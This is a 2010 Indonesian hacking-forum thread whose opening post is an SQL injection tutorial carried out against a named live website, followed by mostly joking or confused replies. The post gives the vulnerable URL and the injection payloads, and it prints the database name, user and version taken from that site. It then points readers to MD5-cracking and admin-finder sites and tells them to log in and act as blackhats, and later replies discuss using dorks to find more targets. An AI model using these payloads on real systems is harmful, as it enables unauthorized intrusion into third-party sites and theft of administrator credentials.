Welcome To t0k3k Miring Crew Official Forum
Welcome To t0k3k Miring Crew Official Forum

Silahkan Klik Login Untuk Masuk Di Forum
Atau Klik Register Untuk Menjadi Member Di t0k3k Miring Crew

Welcome To t0k3k Miring Crew Official Forum


 
IndeksPortalCalendarGalleryFAQPencarianAnggotaGroupPendaftaranLogin

Share | 
 

 Advance SQL Injection + Live Demo By Edelweize

Topik sebelumnya Topik selanjutnya Go down 
Pilih halaman : 1, 2  Next
PengirimMessage
edelweize
Admin
Admin


Jumlah posting : 255
Points : 401
Reputation : 0
Join date : 26.02.10
Age : 23
Lokasi : In This Forum

PostSubyek: Advance SQL Injection + Live Demo By Edelweize   Sun Feb 28, 2010 7:10 pm

waduuhhh,,, newbie mauu share nihh....... Big Grin

jangan di ejek yah kalo salah........ Big Grin maklum kerjaan newbie.....

guaa langsung kasih live demonya,, guaa gakk mauu jelasin.... capekk dahh.......

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Aurthor : Edelweize a.k.a Rue a.k.a Advance SQL Injector
Method : Advance SQL Injection
Vuln URL : http://hrtemps.org/productInfo.php?productID=115%27
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

1.a Vuln Checking

dengan menambahkan tanda ' [aphostrophie] di akhir URL

Picture Live Demo 1.a Vuln Checking

1.b Vuln Checking [ True And False ]

yaitu dengan +and+1=1 << true, +and+1=2 << false

kalo true,, artikel / produk / apalah,, akan keliatan,, tapi kalo false,, artikel / produk / apalah,, gag akan keliatan.....

Picture Live Demo 1.b Vuln Checking [True]

Picture Live Demo 1.b.a Vuln Checking [ False]

2. Penghitungan Collumn

disini setelah menemukan vulnerebalities di website dan melakukan checking Vuln,, selanjutnya kita akan melakukan Penghitungan Collumn yang gunannya untuk melihat berapa column yang ada di site tsb...

+order+by+[nomer]+--+

skarang guaa kasih contohnya langsung aja yahh.... capekk dahh tinggal di aplod melulu picturenya..

Penghitungan Collumn 1

gag ada errornya tuhh.....

Penghitungan Collumn 2

gag ada juga......

Penghitungan Collumn 3

wadduuhh gag ada juga,....... carii truzz...... Other Mood
langsung jumping aja dahh,, capek..... Big Grin

Penghitungan Collumn 20

wiw,, ada errornya.... Other Mood
tapii belom pasti kalo disitu...

Penghitungan Collumn 19

errornya ada juga.....

Penghitungan Collumn 18

wiw,, gag ada errornya.... Big Grin
hore ketemu columnnya .... Good Mood

jadi columnya ada 18 karna errornya pas di 19...... Big Grin

lannjootttt dahh............... Big Grin


3. Menemukan Vulnerabilities Collumn

disini kita akan mempelajari gimana cara menemukan vulnerabilitie column....
kan pada tahap 2 tadi kita udh menemukan berapa jumlah column yg ada di site itu....
skarang coba dahh kita testing di tabel tsb kalo ada vulnnya.... Big Grin

kata kunci : +union+select+[nomer column]+--+

Live Demo Collumn Vulnerabilities Checking 18

wew....
ada vulnnya......... Big Grin

ada angka 3 yang nongol..... Big Grin
skarang udh dape lubang nya dahh.....

lanjootttt.....................

4. Pengecekan Version, User, Ama Database Website......

setelah mendapatkan vuln column dan angkanya yang nongol.....
skarang kita melakukan checking versi MySQL, user, dan database yang dipakai......

kata kunci : concat(database(),0x3a,user(),0x3a,version())

Q : cara penempatannya gimana..??
A : nih liat,, punya mata kan......

Live Demo Database, User, Version Checking.

database : mbstech_newstore
user : mbstech_mbstech@172.20.10.17
version : 5.0.84-percona-b18-log

nahh,, skarang kan udh dapet versi database ama usernya....
nttuu,, MySQLnya versi 5.... Big Grin
berarti gampang dong nginjeknya.... hehehehhee
kalo versi 4 lebih menjurus pada penebakan.. tapi karna target live demonya berversi 5 jadi belum bisa dijelasin,, pokoknya nanti dahh guaa jelasin kalo ada waktu.....

5. Looking For Table Names, Check This Out..!!

setelah dapetin versi mysqlnya [5] skarng kita akan ingin melihat nama2 tabelnya trus melakukan dumping uname ama passwordnya...... hehehehehe

kata kunci 1 : group_concat(table_name)]
kata kunci 2 : +from+information_schema.tables+--+

tauu cara penempatannya..??
nihh....

Table Names Searching

waduuhh banyak amat...... Bad Mood

mari kita sedikitkan...... hehehehe...... Bad Mood

kata kunci 3 : sama kek kata kunci 1
kata kunci 4 : +from+information_schema.tables+where+table_schema<>0x696e666f726d6174696f6e5f736368656d61+--+

gunanya kata kunci 4 itu untuk mengeluarkan nama2 tabel tanpa memuat tabel informasi....
jadi kita lebih leluasa melihat nama tabel yang mangandung admin.... Big Grin

lanjut.... Big Grin

6. Mengeluarkan Nama Collumn Dari Table

nahh,, setelah kita melihat nama table yang dicurigai mencuri [lho kok mencuri] ekh salah,, mengandung admin.....

kita akan melihat isi collumn tsb utk memastikan bahwa tabel tersebut memang mengandung admin...

kata kunci 1 : group_concat(column_name)
kata kunci 2 : +from+information_schema.columns+where+table_name=0xHEXdariNAMATABEL+--+

skarang sebelum menginject, kita udh menemukan tabel yg keknya mengandung admin....
'admin' (wew.. emang mengandung admin,, namanya aja udh kek gitu)

lalu kata admin kita convert menjadi hex di website ascii converter online ataupun software...

nahh,, ini ascii converter dari t0k3k Miring Crew Forum..

- = [ASCII CONVERTER By Edelweize] = -

selama guaa tauu hex dari admin sih 41646d696e

tapi cobalah test dolo,, mungkin guaa salah kali yah..... hehehehe

7. mengeluarkan isi column

nahh ....
udah mauu abis nihh......... Big Grin

skarang setelah melihat nama column dari table, kita akan mengeluarkan isi column untuk melihat (biasanya sih uname ama pass admin)

langsung aja
kata kunci 1 : concat_ws([isi column])
kata kunci 2 : +from+[namacolumn]+--+

Live Demo Mengeluarkan Isi Column

tuuhh...!!
kalo udah keluar skarang...
kita mengcrack passwordnya.... kenapa..?? karna password itu masih dalam keadaan encrypted...

skarang mari mengcrack..... Big Grin
ini situs2 yang menyediakan fasilitas crack md5...
http://md5crack.com/
http://www.victorike.com/tools/

8. Mencari Halaman Login Admin

naahh.....
setelah md5 hash telah kita crack sekarang kita harus menemukan halaman login adminnya.....

kalo saya sihh sering pake situs ini untuk nyari halaman login admin...
http://mormoroth.net/af/

9. Apakah Yang Akan Dilakukan Selanjutnya...??

iyaaaa.....

setelah menemukan uname ama pass juga admin loginnya,.....
kita tinggal login trus melakukan apa yang harus blackhat lakukan...... Bad Mood
(untung guaa ngga kek mereka, guaa kan newbie... Big Grin)

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
End Of Archive
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

btw, yang live demo tadi lohh...... Big Grin
username : admin
password : admin
halaman login admin : carii sendiriii.....!!! Good Mood sdangkan guaa aja gag nemu...... Good Mood

selamat bekerja.... Big Grin


Regards,

edelweize

_________________


Regards,

edelweize
Kembali Ke Atas Go down
Lihat profil user http://t0k3kmiringcrew.forummotion.com/
dedux
V.I.P Member
V.I.P Member


Jumlah posting : 87
Points : 103
Reputation : 0
Join date : 01.03.10
Age : 30
Lokasi : Bali

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Tue Mar 02, 2010 1:10 am

Nga Ngerti Bad Mood

wkwkwkwk
Kembali Ke Atas Go down
Lihat profil user
edelweize
Admin
Admin


Jumlah posting : 255
Points : 401
Reputation : 0
Join date : 26.02.10
Age : 23
Lokasi : In This Forum

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Tue Mar 02, 2010 11:21 am

bisa ngerti kalo disimak baek2 gan...... Big Grin

maklum ane juga masih newbie,, jadi ngga ngerti2 amat..... Good Mood
Kembali Ke Atas Go down
Lihat profil user http://t0k3kmiringcrew.forummotion.com/
peforma1233
V.I.P Member
V.I.P Member


Jumlah posting : 30
Points : 44
Reputation : -2
Join date : 03.03.10
Age : 21
Lokasi : Manado,&lt;jambore tenga&gt;lingkungan 5

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Thu Mar 04, 2010 5:14 pm

iya gw ga ngerti Edwar,,,,,,,,,,,,,,,,

wakwakwkawkakwka..........
Kembali Ke Atas Go down
Lihat profil user
peforma1233
V.I.P Member
V.I.P Member


Jumlah posting : 30
Points : 44
Reputation : -2
Join date : 03.03.10
Age : 21
Lokasi : Manado,&lt;jambore tenga&gt;lingkungan 5

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Thu Mar 04, 2010 5:23 pm

astaga V.I.P nya mana brijer??????
Kembali Ke Atas Go down
Lihat profil user
edelweize
Admin
Admin


Jumlah posting : 255
Points : 401
Reputation : 0
Join date : 26.02.10
Age : 23
Lokasi : In This Forum

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Thu Mar 04, 2010 8:47 pm

@^

tggu kita mo tanya dulu depe admin satu.....

bersabar neh...

btw, jang double post,cukup nn edit jo ngana pe post pertama kong kase gabung tu apa yang ngana mo tulis.. ok.....


Regards,

edelweize
Kembali Ke Atas Go down
Lihat profil user http://t0k3kmiringcrew.forummotion.com/
X-Poison
Admin
Admin


Jumlah posting : 64
Points : 81
Reputation : 1
Join date : 26.02.10
Age : 23
Lokasi : Tangerang.Inc

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Thu Mar 04, 2010 10:43 pm

waduh masternya sedang berbicara .. ane gak ikutan .. Good Mood
gak ngerti soalnya masalah ginian .. Bad Mood
Kembali Ke Atas Go down
Lihat profil user http://pramuda-dw.us.to/
edelweize
Admin
Admin


Jumlah posting : 255
Points : 401
Reputation : 0
Join date : 26.02.10
Age : 23
Lokasi : In This Forum

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Fri Mar 05, 2010 12:24 am

^

ane bukan master gann....... Bad Mood

ane masih newbie.... pengen jadi master tapi ngga kesampean.... Other Mood

ada yang mauu ajarin gag...?? Bad Mood
Kembali Ke Atas Go down
Lihat profil user http://t0k3kmiringcrew.forummotion.com/
dedux
V.I.P Member
V.I.P Member


Jumlah posting : 87
Points : 103
Reputation : 0
Join date : 01.03.10
Age : 30
Lokasi : Bali

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Fri Mar 05, 2010 1:58 am

huahahaha...dasar bhs pemograman aja blm ngerti gwe Bad Mood
Kembali Ke Atas Go down
Lihat profil user
senaidert
V.I.P Member
V.I.P Member


Jumlah posting : 2
Points : 2
Reputation : 0
Join date : 03.03.10

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Fri Mar 05, 2010 9:23 am

....
Other Mood belajar dulu lah yang ginian..
ga ngerti gua..
Kembali Ke Atas Go down
Lihat profil user
sadoelan
Entertainment Moderator
Entertainment Moderator


Jumlah posting : 101
Points : 133
Reputation : 2
Join date : 04.03.10
Age : 24
Lokasi : dunia lain

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Fri Mar 05, 2010 2:36 pm

hahhaha.... si sql injection lg...

sep dah nice post gan... Bad Mood Bad Mood Bad Mood Bad Mood Bad Mood
Kembali Ke Atas Go down
Lihat profil user http://uuddiieenn007@yahoo.com
tryer
V.I.P Member
V.I.P Member


Jumlah posting : 26
Points : 31
Reputation : 1
Join date : 28.02.10

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Sat Mar 06, 2010 4:38 pm

@om performa1233
koq pake foto yang ada tulisan hacker...
berarti hacker yah???
kalo gitu harus nya ngerti..
soalnya kata yang buad thread ini masih yang mudah...

sebener nya sih gw juga bingung..
panjang amitt tutor nya...

---
barusan gw googling, nemu ini..
http://t35.com/latihan/

sama ngga kk??

lagi donk kk penjelasan nya..
masih bingung nii..

minta ym , biar mudah nanya nya,...

thx...
Kembali Ke Atas Go down
Lihat profil user
X-Poison
Admin
Admin


Jumlah posting : 64
Points : 81
Reputation : 1
Join date : 26.02.10
Age : 23
Lokasi : Tangerang.Inc

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Sat Mar 06, 2010 8:59 pm

wah ada anak PHL maen maen kesini .. Good Mood
Kembali Ke Atas Go down
Lihat profil user http://pramuda-dw.us.to/
psych0fren1a
Calon Penduduk Forum
Calon Penduduk Forum


Jumlah posting : 7
Points : 7
Reputation : 0
Join date : 06.03.10
Age : 21
Lokasi : sisi kanan jalan kota

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Sun Mar 07, 2010 12:19 am

waahhh nice post ne kk,,tapi bingung ne mulainya dari mana,,buat nyari yang error tu mesti nyari satu per satu y kk??ingung ne,,butuh ngluangin waktu buat belajar memahami ini ... Good Mood Other Mood
Kembali Ke Atas Go down
Lihat profil user http://pakwin.idohost.com/pakwin.html
edelweize
Admin
Admin


Jumlah posting : 255
Points : 401
Reputation : 0
Join date : 26.02.10
Age : 23
Lokasi : In This Forum

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Sun Mar 07, 2010 2:32 am

@tryer

hahahahhaha

bang ntong rendahin diri nehh......... Big Grin

cuman itu teknik advance guaa bang..... Big Grin

maklum super newbie..... Big Grin

@psikotropika (bener apa kagak yah,, wakkakkka) kidding

diaa juga tergantung dorknya gann.... Big Grin

kalo dork masuk dihati,, pasti bisa dapet yang banyak..........


---

Regards,

edelweize
Kembali Ke Atas Go down
Lihat profil user http://t0k3kmiringcrew.forummotion.com/
psych0fren1a
Calon Penduduk Forum
Calon Penduduk Forum


Jumlah posting : 7
Points : 7
Reputation : 0
Join date : 06.03.10
Age : 21
Lokasi : sisi kanan jalan kota

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Sun Mar 07, 2010 4:26 pm

berarti mesti nyari2 dork dulu ya kk??soalnya dork2 yang biasa dishare udah diselesein sama master2 semua,,ada saran kira2 dork yang banyak dijumpai webnya mengandung banyak bug kk?? Big Grin maap kk klo banyak tanya soalnya g paham apa2 ne kk??

sama satu lagi kk Big Grin ,klo nyari ada errornya g buat web yang enginenya wordpress trus permalink'nya pakai /dd/mm/yyyy/%post% tu gmn ya kk?? Big Grin Other Mood
semoga g kelihatan konyol Other Mood
Kembali Ke Atas Go down
Lihat profil user http://pakwin.idohost.com/pakwin.html
edelweize
Admin
Admin


Jumlah posting : 255
Points : 401
Reputation : 0
Join date : 26.02.10
Age : 23
Lokasi : In This Forum

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Mon Mar 08, 2010 5:08 am

wahhh.......

kalo wordpress mahh ane gag pernah belajar hole nya gann..........

mungkin yang post dibawah anee bisa menjawab....... Big Grin


Regards,

edelweize the warlock
Kembali Ke Atas Go down
Lihat profil user http://t0k3kmiringcrew.forummotion.com/
tryer
V.I.P Member
V.I.P Member


Jumlah posting : 26
Points : 31
Reputation : 1
Join date : 28.02.10

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Mon Mar 08, 2010 1:14 pm

Pramuda wrote:
wah ada anak PHL maen maen kesini .. Good Mood
edelweize wrote:
@tryer
hahahahhaha
bang ntong rendahin diri nehh......... Big Grin
cuman itu teknik advance guaa bang..... Big Grin
maklum super newbie..... Big Grin


---

Regards,

edelweize

lu berdua main-main ah...
kan gw masi belajar ama lu pada....
Kembali Ke Atas Go down
Lihat profil user
peforma1233
V.I.P Member
V.I.P Member


Jumlah posting : 30
Points : 44
Reputation : -2
Join date : 03.03.10
Age : 21
Lokasi : Manado,&lt;jambore tenga&gt;lingkungan 5

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Mon Mar 08, 2010 1:49 pm

gw kurang ngerti jga......................

hehehehehehehe
Kembali Ke Atas Go down
Lihat profil user
edelweize
Admin
Admin


Jumlah posting : 255
Points : 401
Reputation : 0
Join date : 26.02.10
Age : 23
Lokasi : In This Forum

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Tue Mar 09, 2010 4:14 pm

tryer wrote:
Pramuda wrote:
wah ada anak PHL maen maen kesini .. Good Mood
edelweize wrote:
@tryer
hahahahhaha
bang ntong rendahin diri nehh......... Big Grin
cuman itu teknik advance guaa bang..... Big Grin
maklum super newbie..... Big Grin


---

Regards,

edelweize

lu berdua main-main ah...
kan gw masi belajar ama lu pada....


wkwkwkwkwkwkwk.........

saling share disini aja bang.............. Big Grin
sama2 belajar.,...... Big Grin

_________________


Regards,

edelweize
Kembali Ke Atas Go down
Lihat profil user http://t0k3kmiringcrew.forummotion.com/
tryer
V.I.P Member
V.I.P Member


Jumlah posting : 26
Points : 31
Reputation : 1
Join date : 28.02.10

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Wed Mar 10, 2010 6:33 pm

nah ini gw lebih ngga ngerti paan maksud nya...

peforma1233 wrote:
gw kurang ngerti jga......................

hehehehehehehe

padahal dengan bangga dia memasang avatar bertuliskan : " Hakcer"

T T
Kembali Ke Atas Go down
Lihat profil user
Bboy_maverick
Crew Member
Crew Member


Jumlah posting : 99
Points : 124
Reputation : 0
Join date : 08.03.10
Age : 24
Lokasi : manado

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Wed Mar 10, 2010 7:42 pm

waw............ Good Mood Good Mood
Kembali Ke Atas Go down
Lihat profil user http://www.microlighthangar.com/forum/messages.asp?iMsg=171&
edelweize
Admin
Admin


Jumlah posting : 255
Points : 401
Reputation : 0
Join date : 26.02.10
Age : 23
Lokasi : In This Forum

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Wed Mar 10, 2010 10:32 pm

@tryer

iyee tuuhh,,guaa juga gag ngerti dahh,, masak sqli aja gag tauu.........

remove tuhh avatarnya,, ganti avatar bertuliskan "penari"

wkwkwkwkwkwkwkwk

kabooorrr akhh........... Good Mood

_________________


Regards,

edelweize
Kembali Ke Atas Go down
Lihat profil user http://t0k3kmiringcrew.forummotion.com/
tryer
V.I.P Member
V.I.P Member


Jumlah posting : 26
Points : 31
Reputation : 1
Join date : 28.02.10

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Thu Mar 11, 2010 1:28 pm

huhu...
bener juga..
tpi napa mesti penari??
Kembali Ke Atas Go down
Lihat profil user
edelweize
Admin
Admin


Jumlah posting : 255
Points : 401
Reputation : 0
Join date : 26.02.10
Age : 23
Lokasi : In This Forum

PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Thu Mar 11, 2010 7:55 pm

wkwkwkwkwkwk

gag tauu juga...........

gag nyambung mode : ON

wkwkwkwkwk

_________________


Regards,

edelweize
Kembali Ke Atas Go down
Lihat profil user http://t0k3kmiringcrew.forummotion.com/
Sponsored content




PostSubyek: Re: Advance SQL Injection + Live Demo By Edelweize   Today at 5:50 am

Kembali Ke Atas Go down
 
Advance SQL Injection + Live Demo By Edelweize
Topik sebelumnya Topik selanjutnya Kembali Ke Atas 
Halaman 1 dari 2Pilih halaman : 1, 2  Next
 Similar topics
-
» Injection Open Loop vs Close Loop
» WATER INJECTION (WAI) FOR N250R
» (Ask) Ninja 250 Injection vs. Carbu
» WTS:ALL NEW KAWASAKI NINJA 250 INJECTION (SURABAYA )
» #WTA Armor anime Date a live

Permissions in this forum:Anda tidak dapat menjawab topik
Welcome To t0k3k Miring Crew Official Forum :: Dangerous Zone :: Hacking :: Hacking Papers-
Navigasi: